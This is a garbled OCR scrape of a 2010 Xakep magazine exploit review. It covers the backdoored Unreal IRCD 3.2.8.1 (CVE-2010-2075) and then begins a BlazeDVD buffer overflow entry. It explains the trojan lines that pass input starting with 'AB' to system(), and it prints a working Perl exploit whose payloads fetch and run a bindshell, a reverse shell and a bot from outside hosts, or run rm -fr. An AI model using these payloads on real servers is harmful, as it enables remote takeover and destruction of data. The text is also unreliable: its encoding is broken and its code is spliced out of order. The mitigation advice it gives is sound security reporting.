img - Xakep Online

More documents

Recommendations

Info

ВЗЛОМАлексей Синцов, Digital Security a.sintsov@dsec.ruÎÁÇÎÐ ÝÊÑÏËÎÉÒÎÂÍåñìîòðÿ íà òî, ÷òî âñå áîëüøå è áîëüøå ðàçðàáîò÷èêîâ â êóðñå ïðîáëåìèíôîðìàöèîííîé áåçîïàñíîñòè, óÿçâèìîñòè íàõîäÿòñÿ âñå ÷àùå è ÷àùå.Çàòî ýêñïëîéòû ñòàíîâÿòñÿ âñå ñëîæíåå è ñëîæíåå. Òî åñòü, åñëè ðàíüøåäîñòàòî÷íî áûëî ïðîñòî íàéòè óÿçâèìîñòü, òî òåïåðü åùå íàäî ïîíÿòü, êàêåå ðåàëèçîâàòü â âèäå ýêñïëîéòà. Âðåìåíà ìåíÿþòñÿ. Òåïåðü ýòî íå òîëüêîstate-of-art, íî òàêæå è áèçíåñ, è êðèìèíàë. Íî è òàì è òàì ïî îáå ñòîðîíûáàððèêàä åñòü òàëàíòëèâûå è óìíûå ëþäè, ðåçóëüòàò ðàáîòû êîòîðûõïðåäñòàâëåí çäåñü, íà ýòèõ ñòðàíèöàõ.01CVECVE-2010-2075TARGETS• Unreal IRCD v. 3.2.8.1BRIEFВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГОКОДА ЧЕРЕЗ БЭКДОР В UNREAL IRCDНачнем сегодняшний обзор с проблемы в известном IRC-демоне —Unreal IRCD. Да, еще не так давно IRC было для нас всех важнейшимканалом общения. В те времена еще не существовал ни Facebook, ниTwitter, и люди охотно обменивались байтами в консольном режиме. Стех пор утекло не так много воды, и поэтому IRC — по-прежнему полноценныйи популярный сервис.И тем обиднее/веселее (нужное подчеркнуть), что некие злодеи,видимо, фанаты WEB 2.0, желающие захватить мир, внедрили бэкдор(BackDoor — черный вход) в исходные коды дистрибутива Unreal IRCD.«Затрояненная» версия IRC-демона лежала на зеркальных серверахаж с ноября 2009 года по июнь нынешнего года. Надо полагать, чтоза это время множество добрых и честных людей успели установитьданное ПО. Этот факт был обнаружен создателями демона, о чем онисо множеством извинений и донесли до широкой общественности.EXPLOITШирокая общественность пожелала создать эксплойт, которыйиспользует бэкдор в Unreal IRCD, для своих корыстных целей. Даже всостав Metasploit’а добавили соответствующий модуль.Посмотрим, что же представляет собой этот бэкдор. Как оказалось,сам бэкдор — это четыре строчки в исходных кодах, первым деломбыли добавлены две строчки в модуль s_bsc.c, в функцию read_packet(). Эта функция читает и обрабатывает все входящие пакеты.Считанные данные помещаются в переменную readbuf. Сразу послетого, как данные были считаны из сокета, в дело вступают силы зла, авернее, две строчки, внедренные в эту милую функцию злоумышленниками:#ifdef DEBUGMODE3if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))DEBUG3_LOG(readbuf);#endifТут идет сравнение первых двух байт считанных данных с некимистатическими байтами, определенными за DEBUGMODE3_INFO (еслиопределен DEBUGMODE3). Если байты совпадают, то далее считанныеданные переходят в DEBUG3_LOG(). Что же это за определения? А этона самом деле макросы, добавленные в файл struct.h.#define DEBUGMODE3 ((x)->flags & FLAGS_NOFAKELAG). . .#ifdef DEBUGMODE3#define DEBUGMODE3_INFO "AB"#define DEBUG3_LOG(x) DEBUG3_DOLOG_SYSTEM (x). . .#define DEBUG3_DOLOG_SYSTEM(x) system(x)Резюмирую увиденное: при считывании каждого входящего пакетабэкдор сравнивает первые два байта данных с последовательностью«AB». Если совпадение есть, то содержимое данных передается вызовуsystem(), то есть на исполнение в операционку.Эксплойт:#!/usr/bin/perl# Unreal3.2.8.1 Remote Downloader/Execute Trojan# DO NOT DISTRIBUTE -PRIVATE-# -iHaq (2l8)use Socket;use IO::Socket;## Payload options# Ðàçëè÷íûå «íàãðóçêè». Ïî ñóòè êîìàíäû — ýòî ëþáûå# êîìàíäû äëÿ îáîëî÷êè unix/linux, íà÷èíàþùèåñÿ ñ«AB;».# Ïåðâûå äâà áàéòà ãàðàíòèðóþò, ÷òî áýêäîð ïåðåäàñò# âñå â system(); - ÷òîáû âûïîëíèëàñü áåç ïðîáëåì# îñòàëüíàÿ ÷àñòü äàííûõ.my $payload1 = 'AB; cd /tmp; wget http://042 XÀÊÅÐ 08 /139/ 10
BlazeDVD. «Обработчик» восстанавливает стек для работы ROPpacketstormsecurity.org/groups/synnergy/bindshellunix-O bindshell; chmod +x bindshell; ./bindshell &';my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';my $payload4 = 'AB; killall ircd';my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr*';$host = "";$port = "";$type = "";$host = @ARGV[0];$port = @ARGV[1];$type = @ARGV[2];if ($host eq "") { usage(); }if ($port eq "") { usage(); }if ($type eq "") { usage(); }sub usage {printf "\nUsage :\n";printf "perl unrealpwn.pl \n\n";printf "Command list :\n";printf "[1] - Perl Bindshell\n";printf "[2] - Perl Reverse Shell\n";printf "[3] - Perl Bot\n";printf "-----------------------------\n";printf "[4] - shutdown ircserver\n";printf "[5] - delete ircserver\n";exit(1);}} elsif ($type eq "2") {print $sockd "$payload2";} elsif ($type eq "3") {print $sockd "$payload3";} elsif ($type eq "4") {print $sockd "$payload4";} elsif ($type eq "5") {print $sockd "$payload5";} else {printf "\nInvalid Option ...\n\n";usage();}close($sockd);exit(1);}unreal_trojan();# EOFSOLUTIONПроверить исходные коды, из которых собран демон, на наличиешести троянских строк или, что будет проще, проверить MD5-хешархива. У за тро ян е ной версии хеш должен быть 752e46f2d873c1679fa99de3f52a274d , у нормальной версии — 7b741e94e867c0a7370553fd01506c66. Если что не так — удалить строки и пересобрать IRC-демон илискачать с официаль ного сайта (и опять-таки проверить хеш, на всякийпожарный).02CVEN/AПЕРЕПОЛНЕНИЕ БУФЕРАВ BLAZEDVD PLAYERsub unreal_trojan {my $ircserv = $host;my $ircport = $port;# èíèöèèðóåì ñîåäèíåíèåmy $sockd = IO::Socket::INET->new (PeerAddr =>$ircserv, PeerPort => $ircport, Proto => "tcp") || die"Failed to connect to $ircserv on $ircport ...\n\n";print "[+] Payload sent ...\n";# îòñûëêà çëîãî êîíòåíòàif ($type eq "1") {print $sockd "$payload1";XÀÊÅÐ 08 /139/ 10TARGETS• BlazeDVD Player 5.1BRIEFОб уязвимости в этом плеере известно уже достаточно давно, тем неменее я бы хотел обратить внимание на свежий эксплойт под даннуюуязвимость. Дело в том, что эксплойт работает в среде Windows 7, азначит, умеет обходить DEP и ASLR. Автор эксплойта — баг-хантер,известный в Сети под ником mr_me, в девичестве — Стивен Силей(Steven Seeley). Парень этот развлекается тем, что ищет дыры вразличном ПО и пишет адекватные, рабочие эксплойты, за что честьему и хвала (блог товарища — https://net-ninja.net). Хочу отметить,что состоит он в команде Corelan Security Team, создатель которой,043
Page 1: ВЗЛОМ АУТЕНТИФИКАЦ
Page 4 and 5: MegaNews004 Все новое за
Page 6: MEGANEWSМАРИЯ «MIFRILL» НЕ
Page 10 and 11: MEGANEWSÈÇÐÀÈËÜ ÂÅÐÁÓÅ
Page 13 and 14: Реклама11
Page 15 and 16: ÑÏÅÖÑËÓÆÁÛ ÑØÀ ÍÅÃ
Page 17 and 18: ÓÒÅ×ÊÀ ÑÅÊÐÅÒÍÎÉ È
Page 19 and 20: с помощью специаль
Page 21 and 22: Pro3Q QOO!TOWER ION9400 ðóá.ÒÅ
Page 23 and 24: VIEWSONICVOT120 PC MiniÒÅÕÍÈ×
Page 25 and 26: codinglotus.xakep.ruX-testing сont
Page 28 and 29: PC_ZONEСтепан «Step» Иль
Page 30 and 31: PC_ZONEВносим важные п
Page 32 and 33: PC_ZONEАлександр Лозо
Page 34 and 35: PC_ZONEПример асинхро
Page 36 and 37: PC_ZONEКапитан Улитка
Page 38 and 39: PC_ZONEПодробные логи
Page 40 and 41: ВЗЛОМТюрин «GreenDog»
Page 42 and 43: ВЗЛОМ//Èùåì ñòðîêóif
Page 46 and 47: ВЗЛОМAcrobat Reader. Эксп
Page 48 and 49: ВЗЛОМЭтого достато
Page 50 and 51: ВЗЛОМИз ARP-сообщени
Page 52 and 53: ВЗЛОМANTI-NATO natobreak@yahoo
Page 54 and 55: ВЗЛОМНет, конечно,
Page 56 and 57: ВЗЛОМЗазеркалье —
Page 58 and 59: ВЗЛОМ«HellMilitia» and «my
Page 60 and 61: ВЗЛОМXOR_KEY, между пр
Page 62 and 63: ВЗЛОМRAZ0R HTTP://RAZ0R.NAMEП
Page 64 and 65: ВЗЛОММаг icq 884888, http:/
Page 66: ВЗЛОММой шелл на azar
Page 69 and 70: Результат переполн
Page 71 and 72: Описание:access violation
Page 73 and 74: ÂÛÃÎÄÀ•ÃÀÐÀÍÒÈß•
Page 75 and 76: Граббер сайтовНакр
Page 77 and 78: Разбор вывода анти
Page 79 and 80: Реклама
Page 81 and 82: Кристалл запустилс
Page 83 and 84: Зачем и почему нужн
Page 85 and 86: ÔÓÒÓÐÈÑÒÈ×ÍÛÉ ÑÈÍÃ
Page 87 and 88: них мы, конечно, не
Page 89 and 90: в понедельник вот п
Page 91 and 92: Выбор режима работ
Page 93 and 94: Все вспомогательны
Page 95 and 96:
Реклама
Page 97 and 98:
WARNINGwarningРедактируе
Page 99 and 100:
Оптимизируем работ
Page 101 and 102:
WARNINGСокращенная ст
Page 103 and 104:
ldd для Firefoxне в них.
Page 105 and 106:
Реклама
Page 107 and 108:
codingMasterBotBotBotСхема ц
Page 109 and 110:
codingINFOРезультат раб
Page 111 and 112:
codingФорма HoldemConsoleФо
Page 113 and 114:
codingÑàéòû ïî òåìåПр
Page 115 and 116:
codingАдреса загрузки
Page 117 and 118:
CODINGdeeonis deeonis@gmail.comКО
Page 119 and 120:
поймать в месте выз
Page 121 and 122:
ëà äëÿ «Îäíîêëàññí
Page 123 and 124:
ñîäåðæàùèå çàïðåùå
Page 125 and 126:
FORWARD="80>192.168.0.100" â ôà
Page 127 and 128:
OpenBSD, pf и NATîòêðûòûé
Page 129 and 130:
SYN/ACKЕвгений Зобнин
Page 131 and 132:
Apache с различными MPM-
Page 133 and 134:
Слоеный пирог типи
Page 135 and 136:
×òîáû óñòàíîâèòü vSp
Page 137 and 138:
INFOКлиент управлени
Page 139 and 140:
информацию с перер
Page 141 and 142:
Если хочешь быть пр
Page 143 and 144:
обновляемого на са
Page 145 and 146:
x№ 08(139)АВГУСТ 2010>>WIND
show all

img - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?